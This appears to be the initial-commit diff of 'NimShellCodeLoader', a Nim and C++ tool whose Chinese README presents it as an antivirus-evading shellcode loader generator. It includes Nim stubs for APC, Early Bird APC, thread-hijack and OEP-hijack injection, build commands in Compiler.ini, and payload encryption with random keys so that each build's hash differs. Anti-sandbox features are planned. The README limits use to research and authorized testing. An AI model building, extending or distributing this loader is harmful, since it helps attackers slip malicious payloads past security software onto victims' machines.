Initial commit

Initial commit

Author: mysa

APC_Ijnect_Load.nim

@@ -0,0 +1,6 @@
+import public
+
+{.compile: "module\\APC.cpp".}
+proc APCNim(plainBuffer:cstring,size:cint):cint {.importcpp:"APC(@)",header:"module\\public.hpp".}
+
+discard APCNim(code,codelen)

Compiler.ini

@@ -0,0 +1,5 @@
+[compile]
+OEP Hiijack-Inject Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --passL:-lntdll --opt:size -o:.\bin\ -f OEP_Hiijack_Inject_Load.nim
+Thread Hiijack-Inject Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Thread_Hiijack_Inject_Load.nim
+APC-Ijnect Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f APC_Ijnect_Load.nim
+Early Bird APC-Injetc Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Early_Bird_APC_Injetc_Load.nim

Early_Bird_APC_Injetc_Load.nim

@@ -0,0 +1,6 @@
+import public
+
+{.compile: "module\\Early_APC.cpp".}
+proc EarlyAPCNim(plainBuffer:cstring,size:cint):cint {.importcpp:"Early(@)",header:"module\\public.hpp".}
+
+discard EarlyAPCNim(code,codelen)

OEP_Hiijack_Inject_Load.nim

@@ -0,0 +1,6 @@
+import public
+
+{.compile: "module\\OEP.cpp".}
+proc OEPNim(plainBuffer:cstring,size:cint):cint {.importcpp:"OEP(@)",header:"module\\public.hpp".}
+
+discard OEPNim(code,codelen)

README.md

@@ -0,0 +1,78 @@
+<h1 align="center"> NimShellCodeLoader</h1><h2 align="center">Nim编写Windows平台shellcode免杀加载器</h2>
+快速生成免杀可执行文件
+
+![codeloader](pic/codeloader.png)
+## 特点：
+
+1：自带四种加载方式
+
+2：可自行拓展加载方式
+
+3：支持两种加密技术，分别位`3des`加密和凯撒密码，密钥随机，每次生成文件拥有不同hash
+
+<h3 style="color: red;">仅限用于技术研究和获得正式授权的测试活动。</h3>
+## 文件组成：
+
+**`bin` 中存放生成的可执行文件**
+
+**`encryption` 存放加密代码文件**
+
+**`module` 中存放c++功能文件**
+
+![file](pic/file.png)
+
+## 安装：
+
+**1、安装`nim`最新版**
+
+**2、下载本项目，分别编译`encryption`中的`Tdea.nim`和`Caesar.nim`。**
+
+`nim c -d:release --opt:size Tdea.nim`
+
+`nim c -d:release --opt:size Caesar.nim`
+
+**3、编译c#项目，将可执行文件放到当前目录**
+
+## 使用方法：
+
+**1、打开生成器**
+
+**2、将payload拖动到该窗口**
+
+![first](pic/first.png)
+
+**3、选择加载方式，点击生成，可执行文件会保存到bin文件夹中**
+
+![second](pic/second.png)
+
+
+
+## 拓展：
+
+**1、新建`nim`代码文件，引用`public`，获取code（解密的明文shellcode）和`codelen`（明文shellcode长度）**
+
+**![code](pic/code.png)**
+
+**2、将c++的功能代码放到`module`文件夹中，在新建的`nim`文件中调用**
+
+**3、修改`Compiler.ini`文件，添加一行，key为加载方式，value为编译使用的命令行，其中<source>为shellcode文件位置的占位符，<encrypt>为加密方式的占位符，其余可以自行定义。**
+
+![config](pic/config.png)
+
+## 引用：
+
+都是网上公开的方法
+
+https://github.com/Moriarty2016
+
+https://github.com/knownsec/shellcodeloader
+
+https://github.com/byt3bl33d3r/OffensiveNim
+
+## TODO：
+
+- 增加更多的加载方式
+
+- 增加反沙箱等功能
+
+- 增加加密方式

Thread_Hiijack_Inject_Load.nim

@@ -0,0 +1,6 @@
+import public
+
+{.compile: "module\\Thread.cpp".}
+proc ThreadNim(plainBuffer:cstring,size:cint):cint {.importcpp:"Thread(@)",header:"module\\public.hpp".}
+
+discard ThreadNim(code,codelen)

codeLoader/.vs/codeLoader/v16/.suo

@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "codeLoader", "codeLoader\codeLoader.csproj", "{9D1C4E5F-AC7B-4B0B-BB71-FFD5E2C18094}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{9D1C4E5F-AC7B-4B0B-BB71-FFD5E2C18094}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{9D1C4E5F-AC7B-4B0B-BB71-FFD5E2C18094}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{9D1C4E5F-AC7B-4B0B-BB71-FFD5E2C18094}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{9D1C4E5F-AC7B-4B0B-BB71-FFD5E2C18094}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal